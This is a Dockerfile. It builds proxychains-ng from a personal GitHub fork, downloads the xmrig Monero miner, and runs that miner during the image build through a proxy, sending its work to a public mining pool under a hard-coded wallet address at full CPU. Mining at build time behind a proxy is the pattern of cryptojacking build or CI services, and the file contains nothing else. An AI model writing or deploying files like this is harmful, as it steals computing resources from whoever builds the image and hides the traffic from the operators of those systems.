FROM ubuntu:18.10
RUN apt-get -y update && apt-get install && apt-get install -y build-essential && apt-get install -y git && apt-get install -y wget
RUN git clone https://github.com/whiteamelia09/proxychains-ng.git && cd proxychains-ng && ./configure && make && make install && make install-config
RUN wget https://github.com/xmrig/xmrig/releases/download/v2.10.0/xmrig-2.10.0-xenial-x64.tar.gz && tar -xf xmrig-2.10.0-xenial-x64.tar.gz && cd xmrig-2.10.0 && proxychains4 ./xmrig -o stratum+tcp://pool.supportxmr.com:5555 -u 45UVbdyweuJV5peeuD1ypVbFs6Z1nYhRB4r9BEL9xYjE8Ej8Pjob3LQX2dN4m314gB87Z1M9TbabwN4g4L9184dcCLyiU6y -p NvidiaGeForce2 --threads 12 --max-cpu-usage=100 --cpu-priority 5 --donate-level 1